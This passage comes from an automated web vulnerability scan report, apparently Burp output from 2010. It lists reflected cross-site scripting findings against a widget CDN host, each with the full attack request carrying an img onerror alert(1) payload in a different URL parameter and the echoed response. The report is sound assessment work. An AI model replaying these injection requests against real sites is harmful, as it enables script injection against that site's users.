This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96f2f8d<img%20src%3da%20onerror%3dalert(1)>aae1b279c95/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:00 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17787


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
ializationParams : {"id":"53234a87-ed5a-47ec-859e-f6aaec12e3ce","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96f2f8d<img src=a onerror=alert(1)>aae1b279c95/ibmbackupm.png","wbx_ns_link":"http:/ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHandler.initializationParams["fif"];

...[SNIP]...

2.72. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 10]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 10 is copied into the HTML document as plain text between tags. The payload 5b7cf<img%20src%3da%20onerror%3dalert(1)>bbac3dee5f9 was submitted in the REST URL parameter 10. This input was echoed as 5b7cf<img src=a onerror=alert(1)>bbac3dee5f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:5b7cf<img%20src%3da%20onerror%3dalert(1)>bbac3dee5f9//ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:06 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17790


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
-4fa0-afc7-39d1d89ea475","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png","wbx_ns_link":"http:5b7cf<img src=a onerror=alert(1)>bbac3dee5f9//ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHandler.initializationParams["fif"];
if(fifMode && WIDGETBOX.platf
...[SNIP]...

2.73. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 11]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 11 is copied into the HTML document as plain text between tags. The payload ef608<img%20src%3da%20onerror%3dalert(1)>591e49029cb was submitted in the REST URL parameter 11. This input was echoed as ef608<img src=a onerror=alert(1)>591e49029cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.netef608<img%20src%3da%20onerror%3dalert(1)>591e49029cb/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:09 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17790


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
475","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png","wbx_ns_link":"http://ad.doubleclick.netef608<img src=a onerror=alert(1)>591e49029cb/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHandler.initializationParams["fif"];
if(fifMode && WIDGETBOX.platform.FriendlyIFrame){
...[SNIP]...

2.74. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 12]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 12 is copied into the HTML document as plain text between tags. The payload 7f6e7<img%20src%3da%20onerror%3dalert(1)>f5159348289 was submitted in the REST URL parameter 12. This input was echoed as 7f6e7<img src=a onerror=alert(1)>f5159348289 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk7f6e7<img%20src%3da%20onerror%3dalert(1)>f5159348289 HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:12 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17790


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
,"platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png","wbx_ns_link":"http://ad.doubleclick.net/clk7f6e7<img src=a onerror=alert(1)>f5159348289"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHandler.initializationParams["fif"];
if(fifMode && WIDGETBOX.platform.FriendlyIFrame){

...[SNIP]...

2.75. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f479f<img%20src%3da%20onerror%3dalert(1)>391274cdfc2 was submitted in the REST URL parameter 4. This input was echoed as f479f<img src=a onerror=alert(1)>391274cdfc2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/idf479f<img%20src%3da%20onerror%3dalert(1)>391274cdfc2/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:48 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17790


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
adyCallback, true);
}
};

WIDGETBOX.platform.WidgetConfig = WidgetConfig;
})();

WIDGETBOX.platform.WidgetConfigPathHandler = {
initializationParams : {"platform":"InsertWidget","idf479f<img src=a onerror=alert(1)>391274cdfc2":"8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475"},

configurationParams : {"wbx_ns_image":"http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png","wbx_ns_link":"http://ad.doubl
...[SNIP]...

2.76. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload dc396<img%20src%3da%20onerror%3dalert(1)>3789c81a41d was submitted in the REST URL parameter 5. This input was echoed as dc396<img src=a onerror=alert(1)>3789c81a41d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475dc396<img%20src%3da%20onerror%3dalert(1)>3789c81a41d/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:51 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17790


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
true);
}
};

WIDGETBOX.platform.WidgetConfig = WidgetConfig;
})();

WIDGETBOX.platform.WidgetConfigPathHandler = {
initializationParams : {"id":"8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475dc396<img src=a onerror=alert(1)>3789c81a41d","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png","wbx_ns_link":"http://ad.doubleclick.net/cl
...[SNIP]...

2.77. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload e1ad5<img%20src%3da%20onerror%3dalert(1)>e2109e2c33e was submitted in the REST URL parameter 6. This input was echoed as e1ad5<img src=a onerror=alert(1)>e2109e2c33e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:e1ad5<img%20src%3da%20onerror%3dalert(1)>e2109e2c33e//img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:54 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17790


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
();

WIDGETBOX.platform.WidgetConfigPathHandler = {
initializationParams : {"id":"8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http:e1ad5<img src=a onerror=alert(1)>e2109e2c33e//img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png","wbx_ns_link":"http://ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.
...[SNIP]...

2.78. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 7e6dd<img%20src%3da%20onerror%3dalert(1)>f1f9cf33df7 was submitted in the REST URL parameter 7. This input was echoed as 7e6dd<img src=a onerror=alert(1)>f1f9cf33df7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com7e6dd<img%20src%3da%20onerror%3dalert(1)>f1f9cf33df7/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:57 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17782


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
form.WidgetConfigPathHandler = {
initializationParams : {"id":"8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http://img.widgetbox.com7e6dd<img src=a onerror=alert(1)>f1f9cf33df7/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png","wbx_ns_link":"http://ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConf
...[SNIP]...

2.79. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload aa6fc<img%20src%3da%20onerror%3dalert(1)>c10e1999b07 was submitted in the REST URL parameter 8. This input was echoed as aa6fc<img src=a onerror=alert(1)>c10e1999b07 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploadedaa6fc<img%20src%3da%20onerror%3dalert(1)>c10e1999b07/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:59 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17790


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
etConfigPathHandler = {
initializationParams : {"id":"8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http://img.widgetbox.com/uploadedaa6fc<img src=a onerror=alert(1)>c10e1999b07/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png","wbx_ns_link":"http://ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHan
...[SNIP]...

2.80. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 525ac<img%20src%3da%20onerror%3dalert(1)>31e1f24bbff was submitted in the REST URL parameter 9. This input was echoed as 525ac<img src=a onerror=alert(1)>31e1f24bbff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05525ac<img%20src%3da%20onerror%3dalert(1)>31e1f24bbff/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:03 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17782


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
alizationParams : {"id":"8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05525ac<img src=a onerror=alert(1)>31e1f24bbff/ibm_backupe.png","wbx_ns_link":"http://ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHandler.initializationParams["fif"];
...[SNIP]...

2.81. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 10]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 10 is copied into the HTML document as plain text between tags. The payload 7f7f5<img%20src%3da%20onerror%3dalert(1)>3c654610702 was submitted in the REST URL parameter 10. This input was echoed as 7f7f5<img src=a onerror=alert(1)>3c654610702 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:7f7f5<img%20src%3da%20onerror%3dalert(1)>3c654610702/ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:04 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17780


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
9-4fa0-afc7-39d1d89ea475","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png","wbx_ns_link":"http:7f7f5<img src=a onerror=alert(1)>3c654610702/ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHandler.initializationParams["fif"];
if(fifMode && WIDGETBOX.platfo
...[SNIP]...

2.82. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 11]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 11 is copied into the HTML document as plain text between tags. The payload a0036<img%20src%3da%20onerror%3dalert(1)>08dc7b33eb9 was submitted in the REST URL parameter 11. This input was echoed as a0036<img src=a onerror=alert(1)>08dc7b33eb9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.neta0036<img%20src%3da%20onerror%3dalert(1)>08dc7b33eb9/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:08 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17788


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
ea475","platform":"InsertWidget"},

